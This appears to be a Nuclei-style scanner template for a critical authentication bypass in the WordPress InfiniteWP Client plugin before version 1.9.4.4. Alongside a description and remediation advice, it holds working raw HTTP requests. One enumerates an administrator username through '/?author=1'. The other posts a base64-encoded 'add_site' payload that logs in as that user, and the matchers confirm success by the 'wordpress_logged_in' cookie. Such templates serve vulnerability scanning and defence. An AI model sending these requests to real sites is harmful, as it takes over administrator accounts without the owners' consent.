id: wordpress-infinitewp-auth-bypass
info:
  name: WordPress InfiniteWP Client Authentication Bypass
  author:
  - l0ne1y
  description: |-
    WordPress Plugin InfiniteWP Client Unauthorized Access to Obtain Administrator Privileges Vulnerability
    WordPress is a blogging platform developed by the WordPress Foundation using the PHP language. The platform supports setting up personal blog websites on PHP and MySQL servers.

    There is a security vulnerability in WordPress InfiniteWP Client versions prior to 1.9.4.4, which allows an attacker to log in to the administrator account.
  severity: critical
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: https://wordpress.org/plugins/iwp-client/#developers

    Temporary fix:
    1. The front and back ends verify user input information at the same time, a double verification mechanism.
    2. Before calling the function, verify whether the user has the permission to call the relevant function.
    3. The encrypted resource ID referenced by the direct object prevents attackers from enumerating IDs and specializes in handling sensitive data.
    4. Use a mature permission management framework, such as spring security.
    5. The user's credentials for access operations (such as user ID, product number, order serial number, etc.) are preferably obtained by associating the session on the server side or encrypting it and placing it in the session.
    6. When a form or other parameters must be used to submit the user's credentials for access operations (such as user ID, product number, order serial number, etc.), a construction method that is difficult to guess (adding letters and random numbers, etc.) should be used as much as possible or a complex encryption algorithm should be used to encrypt and submit. The credentials and session permissions submitted by the client should be strictly verified, such as whether the submitted product number is a product number belonging to the logged-in user.
    7. Conduct strict permission verification on the management function modules. If not necessary, it is recommended not to open the Internet or perform access control at the network layer.
requests:
- matchers:
  - type: word
    part: header
    words:
    - wordpress_logged_in
  - type: word
    part: body
    words:
    - <IWPHEADER>
  - type: status
    status:
    - 200
  extractors:
  - name: username
    type: regex
    regex:
    - Author:(?:[A-Za-z0-9 -\_="]+)?<span(?:[A-Za-z0-9 -\_="]+)?>([A-Za-z0-9]+)<\/span>
    group: 1
    part: body
    internal: true
  - name: username
    type: regex
    regex:
    - 'ion: https:\/\/[a-z0-9.]+\/author\/([a-z]+)\/'
    group: 1
    part: header
    internal: true
  matchers-condition: and
  raw:
  - |
    GET /?author=1 HTTP/1.1
    Host: {{Hostname}}
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: en-US,en;q=0.9
  - |
    POST / HTTP/1.1
    Host: {{Hostname}}
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Content-Type: application/x-www-form-urlencoded

    _IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"{{username}}\"}}")}}
  redirects: true
